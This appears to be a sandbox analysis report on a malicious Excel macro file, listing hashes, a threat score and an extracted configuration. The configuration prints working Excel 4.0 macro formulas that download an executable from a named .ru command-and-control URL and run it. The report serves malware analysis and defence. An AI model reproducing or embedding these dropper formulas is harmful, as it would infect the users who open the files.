General

  • Target

    9cf979d335b81e468e3633440256030be7723c5d5fb1bbcc7d016ea6ec539276.zip

  • Size

    45KB

  • Sample

    250326-z4akkss1a1

  • MD5

    f0e511946dbf25ba70ef77636ddaaec8

  • SHA1

    f890230a292fca9d27f88c3725f41320ff4810ad

  • SHA256

    9cf979d335b81e468e3633440256030be7723c5d5fb1bbcc7d016ea6ec539276

  • SHA512

    79b33a4198b6f4615cf454cc294fe27425cf9a9595a962df90e166489c3cea37f80c8eaff91c0e83005acba32716253358db42ca83055f6a5ddd6394995617db

  • SSDEEP

    768:Tx2U43NtxXkjkUXPKX/bNYvv8dtaYfbN0CWTqS+SaTS3FDY8ic:TUjJrU/WKeE26eS+v23KI

Score
10/10

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

http://invoice7mukszq9nbpa7online.ru/unfeminized.exe

Attributes
  • formulas

    =CALL("URLMON","URLDownloadToFileA","JJCCJJ",0,"http://invoice7mukszq9nbpa7online.ru/unfeminized.exe","C:\ProgramData\plaukbp.exe",0,0)
    =CALL("Shell32","ShellExecuteA","JJCCCCJ",0,"Open","C:\ProgramData\plaukbp.exe",,0,0)
    =HALT()

Extracted

Language
xlm4.0
Source
xlm40.dropper
URLs

http://invoice7mukszq9nbpa7online.ru/unfeminized.exe

Targets

    • Target

      42b382be2e0f600fcec16ead4440475ffa839ed56724ef960b24f2affda4afb9.xlsm

    • Size

      52KB

    • MD5

      7595dc40f4afafd883b97b2690c04fe0

    • SHA1

      0e7b3cc495b0e570cc61a19ee27b7fab133a069a

    • SHA256

      42b382be2e0f600fcec16ead4440475ffa839ed56724ef960b24f2affda4afb9

    • SHA512

      47e1fc418f81809cd91dcdcf377a0acf85135cd67bc97a239ee3845516c585e1e29ee12ffa7a60b451d7e3568a818f80f17265756c666335d3b9769adc038520

    • SSDEEP

      1536:4MB1cciQkfzdjhJzBLCO7OJAgeSURsxhfwkWQAyk:4MB1c/dzBmK+xWIk

    Score
    10/10
